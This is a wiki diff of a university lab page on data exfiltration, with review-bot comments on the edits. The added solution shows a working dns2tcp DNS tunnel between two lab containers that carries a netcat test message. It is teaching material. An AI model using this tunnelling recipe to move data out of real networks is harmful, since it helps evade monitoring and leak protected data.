This shows you the differences between two versions of the page.
cdci:labs:6 [2020/03/17 01:40] mihai.chiroiu [07. [20p] DNS exfiltration] |
cdci:labs:6 [2024/05/10 14:22] (current) mihai.chiroiu [01. [5p] Virtual machine setup] |
||
---|---|---|---|
Line 1: | Line 1: | ||
====== Lab06. Data exfiltration ====== | ====== Lab06. Data exfiltration ====== | ||
+ | |||
+ | <note warning> | ||
+ | Important read to be graded! | ||
+ | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | ||
+ | </note> | ||
===== Objectives ===== | ===== Objectives ===== | ||
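Review bot: The added warning text "Important read to be graded!" does not say what the student must do with the included page `:cdci:rec`. Spell out the requirement in a full sentence, for example that the rules included below must be read and followed for the lab to be graded.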
Line 22: | Line 27: | ||
git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | ||
git config user.email "student@upb.ro" | git config user.email "student@upb.ro" | ||
+ | </code> | ||
+ | |||
+ | Now we need to build some docker containers | ||
+ | <code> | ||
+ | root@cdci:/# cd cdci/containers/exfiltration_lab06/ | ||
+ | root@cdci:/# make | ||
</code> | </code> | ||
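Review bot: In the added transcript the prompt on the `make` line still reads `root@cdci:/#` although the line before it runs `cd cdci/containers/exfiltration_lab06/`, so a student who goes by the prompt may run `make` from `/`. Show the prompt as it looks after the `cd`, or fold the two commands into one line (`cd cdci/containers/exfiltration_lab06/ && make`). The relative `cd` also only works if the repository was cloned into `/`, which the `git clone` context line does not state. The lead-in sentence "Now we need to build some docker containers" is missing its final punctuation and could say what the containers are used for in the lab.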
Line 193: | Line 204: | ||
==== 07. [20p] DNS exfiltration ==== | ==== 07. [20p] DNS exfiltration ==== | ||
- | For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is dns2tcp. Use the following configuration for the client/server side. | + | For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is [[http://www.linuxcertif.com/man/1/dns2tcpc/|dns2tcp]]. Use the following configuration for the client/server side. |
* Client side configuration | * Client side configuration | ||
<code> | <code> | ||
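Review bot: The new link on the word dns2tcp goes to the client man page only (`/man/1/dns2tcpc/`) and uses plain `http://` on a third-party mirror, while the sentence asks for both client and server configuration. Label the link as the dns2tcpc man page and add a matching reference for dns2tcpd, or link the tool's own documentation instead, and use https if the host offers it.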
Line 219: | Line 230: | ||
<solution> | <solution> | ||
<code> | <code> | ||
+ | root@h2:/# dns2tcpd -f .dns2tcpdrc | ||
+ | root@h2:/# netstat -nlup | ||
+ | Active Internet connections (only servers) | ||
+ | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
+ | udp 0 0 0.0.0.0:53 0.0.0.0:* 428/dns2tcpd | ||
+ | root@h2:/# nc -l -p 8080 -k | ||
+ | TEST | ||
+ | |||
+ | root@h1:/# dns2tcpc -f .dns2tcprc 192.168.16.3 & | ||
+ | [2] 196 | ||
+ | root@h1:/# Listening on port : 8080 | ||
+ | root@h1:/# netstat -nltp | ||
+ | Active Internet connections (only servers) | ||
+ | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
+ | tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 196/dns2tcpc | ||
+ | root@h1:/# nc 127.0.0.1 8080 | ||
+ | TEST | ||
+ | ^C | ||
</code> | </code> | ||
</solution> | </solution> |
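Review bot: The added solution shows `TEST` arriving on h2 but nothing in the transcript shows the DNS traffic that carried it, which is the point of the exercise. Add a short capture on h2's UDP port 53 (the socket `netstat -nlup` reports for dns2tcpd) taken while `nc 127.0.0.1 8080` runs on h1, so the student can see the queries and learn what this tunnel looks like on the wire. Two smaller points: `TEST` is printed under the h2 listener before the h1 commands that send it, so the two terminals should be labelled or separated, and `192.168.16.3` is used without saying which node it belongs to.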